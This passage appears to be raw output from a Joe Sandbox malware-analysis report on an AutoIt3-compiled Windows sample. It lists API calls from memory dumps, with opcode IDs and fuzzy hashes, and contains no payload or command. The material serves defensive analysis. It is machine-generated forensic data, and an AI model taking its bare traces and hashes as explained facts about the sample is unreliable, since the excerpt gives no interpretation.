                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0021C297
                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0021C2AD
                                                                                                                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0021C2C8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00227C6C
                                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00227C9F
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00227CB5
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00227CBC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001FC657
                                                                                                                                                                  • GetStockObject.GDI32(00000011), ref: 001FC66B
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 001FC675
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                  APIs
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0022354D,?,002245D5,?,00008000), ref: 002249EE
                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0022354D,?,002245D5,?,00008000), ref: 00224A13
                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0022354D,?,002245D5,?,00008000), ref: 00224A1D
                                                                                                                                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,0022354D,?,002245D5,?,00008000), ref: 00224A50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                  • Instruction ID: cf3a910833b356e6e5af8b0915c37d9fa8f9cabd7393e7720bd8ec469e92becb
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                  • Instruction Fuzzy Hash: A6014E3202065EFBCF125E84DC45CEE3FA2BB68754B588455FE1859031D336CAB1AB81
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020869D: __getptd_noexit.LIBCMT ref: 0020869E
                                                                                                                                                                  • __lock.LIBCMT ref: 0020811F
                                                                                                                                                                  • InterlockedDecrement.KERNEL32(?), ref: 0020813C
                                                                                                                                                                  • _free.LIBCMT ref: 0020814F
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(00DAE828), ref: 00208167
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2704283638-0
                                                                                                                                                                  • Opcode ID: aeff1382555186d565edaeea6de29265f5e7c63e13d349b132639720381dd16a
                                                                                                                                                                  • Instruction ID: dd7ba04f70bdbbcb95b8853359c7a624c5ad94d7d16bdbdfcaa771859ddac404
                                                                                                                                                                  • Opcode Fuzzy Hash: aeff1382555186d565edaeea6de29265f5e7c63e13d349b132639720381dd16a
                                                                                                                                                                  • Instruction Fuzzy Hash: FE01A131D21712EBCB15AF24A80A76AB3A0BF44710F054046F858672D3CF746832CFD6
                                                                                                                                                                  APIs
                                                                                                                                                                  • __lock.LIBCMT ref: 00208768
                                                                                                                                                                    • Part of subcall function 00208984: __mtinitlocknum.LIBCMT ref: 00208996
                                                                                                                                                                    • Part of subcall function 00208984: RtlEnterCriticalSection.NTDLL(00200127), ref: 002089AF
                                                                                                                                                                  • InterlockedIncrement.KERNEL32(DC840F00), ref: 00208775
                                                                                                                                                                  • __lock.LIBCMT ref: 00208789
                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 002087A7
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1687444384-0
                                                                                                                                                                  • Opcode ID: df20ffa5ee2aa5f14ece72571305a9cfcf79dafa5eac20e649b3d53c9e122cde
                                                                                                                                                                  • Instruction ID: 6b2844a37dd7a56f30f92932461f1dd6c155f27985f14e605a09886793af3931
                                                                                                                                                                  • Opcode Fuzzy Hash: df20ffa5ee2aa5f14ece72571305a9cfcf79dafa5eac20e649b3d53c9e122cde
                                                                                                                                                                  • Instruction Fuzzy Hash: DB015B75920B019FE720AF65D80975AF7E0BF40325F20890EE09A876E2DBB0A650CF05
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00229C7F
                                                                                                                                                                    • Part of subcall function 0022AD14: _memset.LIBCMT ref: 0022AD49
                                                                                                                                                                  • _memmove.LIBCMT ref: 00229CA2
                                                                                                                                                                  • _memset.LIBCMT ref: 00229CAF
                                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00229CBF
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 48991266-0
                                                                                                                                                                  • Opcode ID: 1adf7c2c3c7d411946557115efa5f9a036eaa8c6d543adb7a58ca5a1bfe25823
                                                                                                                                                                  • Instruction ID: 8ebe1be1d7bec9701615ccc4f64c5f6a18f3c186b27807430933d523b5b7624d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1adf7c2c3c7d411946557115efa5f9a036eaa8c6d543adb7a58ca5a1bfe25823
                                                                                                                                                                  • Instruction Fuzzy Hash: A3F03076200114BBCB016F54EC85A59BB29EF49310B04C055FE085E217C771A825DFB5
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 001FB5EB
                                                                                                                                                                    • Part of subcall function 001FB58B: SelectObject.GDI32(?,00000000), ref: 001FB5FA
                                                                                                                                                                    • Part of subcall function 001FB58B: BeginPath.GDI32(?), ref: 001FB611
                                                                                                                                                                    • Part of subcall function 001FB58B: SelectObject.GDI32(?,00000000), ref: 001FB63B
                                                                                                                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0024E860
                                                                                                                                                                  • LineTo.GDI32(00000000,?,?), ref: 0024E86D
                                                                                                                                                                  • EndPath.GDI32(00000000), ref: 0024E87D
                                                                                                                                                                  • StrokePath.GDI32(00000000), ref: 0024E88B
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1539411459-0
                                                                                                                                                                  • Opcode ID: 4afa7873438ac82aa75b2958c94c972cd2c19975f576a5397fcef2d87de9e4af
                                                                                                                                                                  • Instruction ID: b7b994c3ea59afc5b17b47d5a55104153ce5c97748a19d58e73ace9e4efdcc33
                                                                                                                                                                  • Opcode Fuzzy Hash: 4afa7873438ac82aa75b2958c94c972cd2c19975f576a5397fcef2d87de9e4af
                                                                                                                                                                  • Instruction Fuzzy Hash: 85F05E3150525ABBEF165F54BC0DFCA3F99AF0A321F048141FA11210E187B99561CF95
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0021D640
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0021D653
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0021D65A
                                                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 0021D661
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                                                  • Opcode ID: 16cc1e4a7ccf43b5b4a5bf13d2ebb44913252b0b0fa88588f908250e2a91109c
                                                                                                                                                                  • Instruction ID: 9c0d31af5cff8ca105d100edf5ddf294b3ac1293ab1900fa5acb2216a820d63c
                                                                                                                                                                  • Opcode Fuzzy Hash: 16cc1e4a7ccf43b5b4a5bf13d2ebb44913252b0b0fa88588f908250e2a91109c
                                                                                                                                                                  • Instruction Fuzzy Hash: 90E01531A01268BADB201FA2FC0DEDB7F5CEB267A1F008010F60C85060CAF5A590CBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(00000008), ref: 001FB0C5
                                                                                                                                                                  • SetTextColor.GDI32(?,000000FF), ref: 001FB0CF
                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 001FB0E4
                                                                                                                                                                  • GetStockObject.GDI32(00000005), ref: 001FB0EC
                                                                                                                                                                  • GetWindowDC.USER32(?,00000000), ref: 0025ECFA
                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0025ED07
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0025ED20
                                                                                                                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0025ED39
                                                                                                                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0025ED59
                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 0025ED64
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1946975507-0
                                                                                                                                                                  • Opcode ID: 07c25f25bf92d0567dcdcbdb72ffc5078fb324304e3c97150aebe263a9ebc3f1
                                                                                                                                                                  • Instruction ID: 577d53ce77b58ba6a0bda6ba9259faf8ffdfda825febca033591aeb3e4e39112
                                                                                                                                                                  • Opcode Fuzzy Hash: 07c25f25bf92d0567dcdcbdb72ffc5078fb324304e3c97150aebe263a9ebc3f1
                                                                                                                                                                  • Instruction Fuzzy Hash: F5E06D31A04248AEEF215F74BC4D7983B25AB16336F00C2A6FB6A580E2C3F18684CB11
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                  • Opcode ID: d27cf708645ecadaf132dbc08fc6c520ba2c7d39c8f0ab69b4fe6d02b44ee467
                                                                                                                                                                  • Instruction ID: c0c6a1f934cf58b4cef99ea43b2df8704cd43ea22e9219524edcd0d98d819f9e
                                                                                                                                                                  • Opcode Fuzzy Hash: d27cf708645ecadaf132dbc08fc6c520ba2c7d39c8f0ab69b4fe6d02b44ee467
                                                                                                                                                                  • Instruction Fuzzy Hash: C9E046B1A00208EFDB005F70EC4CA697BE9EB4C361F21C405FD4A8B260EBF598818B50
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                  • Opcode ID: 0d4eed7879be28793de261ca378dbde1448264b78b50c2f81f0e80f9d5858cc9
                                                                                                                                                                  • Instruction ID: 30443d78077229e0d3f824ef84a9ea575ebd8e575d8b75e0b660e1f0fcfb8f91
                                                                                                                                                                  • Opcode Fuzzy Hash: 0d4eed7879be28793de261ca378dbde1448264b78b50c2f81f0e80f9d5858cc9
                                                                                                                                                                  • Instruction Fuzzy Hash: 28E0B6B5A00248EFDB005F70EC4C6697BE9EB4C361F11C415FA4A8B261DBB999818B50
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memmove
                                                                                                                                                                  • String ID: >$DEFINE
                                                                                                                                                                  • API String ID: 4104443479-1664449232
                                                                                                                                                                  • Opcode ID: 0cfc6d8278c475ca705f68bcfbce39230aa1c80b3b3cbfddcd664ee0254add43
                                                                                                                                                                  • Instruction ID: 597b7e2014fa491a0b39b927ee369e749e8de00e936806981ddd40305bc8cd97
                                                                                                                                                                  • Opcode Fuzzy Hash: 0cfc6d8278c475ca705f68bcfbce39230aa1c80b3b3cbfddcd664ee0254add43
                                                                                                                                                                  • Instruction Fuzzy Hash: CA129C74A1060ACFCF28CF59C880AADB7B1FF58314F25815AE809AB391D730ADD5CB90
                                                                                                                                                                  APIs
                                                                                                                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0021ECA0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ContainedObject
                                                                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                                                                  • API String ID: 3565006973-3941886329
                                                                                                                                                                  • Opcode ID: e413c4b01678bde968d37565e0ef1df0aab27e126cfca39360c40d495aaffc9d
                                                                                                                                                                  • Instruction ID: f3eede47f34f46fcfd5340fc634fa27c185f58248dcd1e70d7b33c11f383df44
                                                                                                                                                                  • Opcode Fuzzy Hash: e413c4b01678bde968d37565e0ef1df0aab27e126cfca39360c40d495aaffc9d
                                                                                                                                                                  • Instruction Fuzzy Hash: 25914B70620701EFDB14CF64C884BAABBE9BF59710F15846DE84ACB691DBB0E891CB50
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E3BCF: _wcscpy.LIBCMT ref: 001E3BF2
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • __wcsnicmp.LIBCMT ref: 0022E785
                                                                                                                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0022E84E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                  • String ID: LPT
                                                                                                                                                                  • API String ID: 3222508074-1350329615
                                                                                                                                                                  • Opcode ID: 2d8a63abbb02e5717d708cd84047d6a3ccce85b66cdb58a951a900b91c7a4f15
                                                                                                                                                                  • Instruction ID: 5938a15b6b2d83766197aae6a2596845eab546fbf5df989640e195709f042ac9
                                                                                                                                                                  • Opcode Fuzzy Hash: 2d8a63abbb02e5717d708cd84047d6a3ccce85b66cdb58a951a900b91c7a4f15
                                                                                                                                                                  • Instruction Fuzzy Hash: EA61A075A20225AFCF14DF94D895EAEB7F4EF18310F0140A9F54AAB3A0DB70AE50DB51
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 001E1B83
                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 001E1B9C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E417D: __fread_nolock.LIBCMT ref: 001E419B
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022CF49
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0022CF5C
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                  • String ID: FILE
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • __getbuf.LIBCMT ref: 00209B8A
                                                                                                                                                                  • __lseeki64.LIBCMT ref: 00209BFA
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __getbuf__getptd_noexit__lseeki64
                                                                                                                                                                  • String ID: pM!
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 0024A668
                                                                                                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0024A67D
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: '
                                                                                                                                                                  APIs
                                                                                                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 0024961B
                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00249657
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$DestroyMove
                                                                                                                                                                  • String ID: static
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00225BE4
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00225C1F
                                                                                                                                                                  Strings
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  APIs
                                                                                                                                                                  • __snwprintf.LIBCMT ref: 00236BDD
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __snwprintf_memmove
                                                                                                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                  • API String ID: 3506404897-2584243854
                                                                                                                                                                  • Opcode ID: 6be27905461cbc2ce7f272898d08a68cedd5245b8131ecd49b1a7f04cc3e72d4
                                                                                                                                                                  • Instruction ID: 4a9e1e3180cb4a228450ebc061af881f69239c9379725e542b844f0bab6a461c
                                                                                                                                                                  • Opcode Fuzzy Hash: 6be27905461cbc2ce7f272898d08a68cedd5245b8131ecd49b1a7f04cc3e72d4
                                                                                                                                                                  • Instruction Fuzzy Hash: 8421E171610218BFCF00EF95CC8AEAE77B9EF55700F008855F505A7182DB70EA62CBA1
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00249269
                                                                                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00249274
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: Combobox
                                                                                                                                                                  • API String ID: 3850602802-2096851135
                                                                                                                                                                  • Opcode ID: 6f31c52a5f2640379db2da569e3db611324a94276b9afdcf33bec5c256a40eed
                                                                                                                                                                  • Instruction ID: 6ac4d6b9b1b8a267a906b21f5ba058c58ed81a4aaa33f22b04da61b83f51d75e
                                                                                                                                                                  • Opcode Fuzzy Hash: 6f31c52a5f2640379db2da569e3db611324a94276b9afdcf33bec5c256a40eed
                                                                                                                                                                  • Instruction Fuzzy Hash: 0411C871710109BFEF15DF54DC91EBB375AEB893A4F104124F91997290D6B1DCB18BA0
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 001FC657
                                                                                                                                                                    • Part of subcall function 001FC619: GetStockObject.GDI32(00000011), ref: 001FC66B
                                                                                                                                                                    • Part of subcall function 001FC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 001FC675
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00249775
                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0024978F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                  • String ID: static
                                                                                                                                                                  • API String ID: 1983116058-2160076837
                                                                                                                                                                  • Opcode ID: 3990784804fd8f24af77b10a1548d5cb76695c442ba012aab2958c9deeea1494
                                                                                                                                                                  • Instruction ID: ee2590dcc280e938e61d73629877b5473fffc1f5a5bc835fd1e05cd5061e9341
                                                                                                                                                                  • Opcode Fuzzy Hash: 3990784804fd8f24af77b10a1548d5cb76695c442ba012aab2958c9deeea1494
                                                                                                                                                                  • Instruction Fuzzy Hash: D311297262020AAFDF04DFB8DC49EEA7BA8FB08314F014529F956E3250D775E861DB50
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 002494A6
                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002494B5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                                                                                                  • String ID: edit
                                                                                                                                                                  • API String ID: 2978978980-2167791130
                                                                                                                                                                  • Opcode ID: 37688154b371129e6a8f380dcffbac112ca5e5b55eabb564a42af33b14e6a92a
                                                                                                                                                                  • Instruction ID: 2cb70cfc177ca667feff8d9f91bca3c683720dd6ee78eddaa84379661147cd60
                                                                                                                                                                  • Opcode Fuzzy Hash: 37688154b371129e6a8f380dcffbac112ca5e5b55eabb564a42af33b14e6a92a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A116D71520109AFEF148EA4EC44AAB3769EB05378F508724F965931D0C775DCA29B60
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00225CF3
                                                                                                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00225D12
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoItemMenu_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 2223754486-4108050209
                                                                                                                                                                  • Opcode ID: fe1f90b2f41af6e0f23d5f9c309964070d28efca48cd760517936de6315ac210
                                                                                                                                                                  • Instruction ID: 8166e462f90ec8a5bb75d53f437adb4ce98d83de0185339d67fe3486a1aeca19
                                                                                                                                                                  • Opcode Fuzzy Hash: fe1f90b2f41af6e0f23d5f9c309964070d28efca48cd760517936de6315ac210
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A118171921639BBDB20DE98F848B9977E99B06354F188012E941EB191E7B0AD24C791
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0023544C
